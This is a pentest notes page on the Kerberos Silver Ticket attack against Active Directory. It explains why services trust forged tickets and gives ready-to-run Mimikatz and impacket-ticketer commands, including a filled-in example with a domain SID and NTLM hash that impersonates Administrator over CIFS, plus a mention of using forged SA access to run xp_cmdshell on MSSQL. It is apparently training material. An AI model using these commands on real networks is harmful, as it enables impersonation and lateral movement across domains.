Silver ticket

The Silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of service is owned (like the PC account hash). Thus, it is possible to gain access to that service by forging a custom TGS as any user.

Information needed to create a golden ticket

  • Domain Name

  • Domain SID

  • Username to impersonate

  • service account NTLM hash

Generating a silver ticket 

Invoke-Mimikatz -Command '"kerberos::golden /domain:[domain] /sid:[domain sid] /target:[target computer] /service:[service] /rc4:[service account hash/machine account hash] /user:[impersonating user] /ptt"'

The machine $ account can be used as the service account

Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorpdc.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"'

Scenarios

Service accounts (accounts tied to SPNs) are powerful because if someone compromises them, they can use silver tickets to impersonate any user, in the context of that service.

There is a flaw here. If someone would be able to get access to the service master key, he would be able to craft a ticket with any content because the target service will trust the contents if it can decrypt it successfully. This is possible because the service never checks back with the DC if the ticket is actually coming from the DC.

And this is basically what silver tickets are. If you can get access to the password / ntlm hash of the account a service runs under, you can spoof a ticket & become any user in context of the application.

MSSQL Server

Assume you target a MSSQL database. Compromising the Service accounts (accounts tied to SPNs), we can craft a Silver Ticket, that will be able to impersonate the SA user & use it to enable & execute xp_cmdshell.

To create a silver ticket, you can either use impacket-ticketer.py or mimikatz. In both cases you will need the password / ntlm hash of the account the application/database is running under. This can be the machine account if virtual accounts are used, or a service account. In case it’s a service account you might be able to kerberoast & crack the password.

Impacket-Ticketer.py

impacket-ticketer -nthash <ntlm hash> -domain-sid <sid> -domain <domain> -spn <spn> -user-id <id> <username>

You can then export the resulting ticket:

export KRB5CCNAME=user.ccache

Availible services

References

PreviousGolden ticketNextDSRM (Directory Services Restore Mode)

Last updated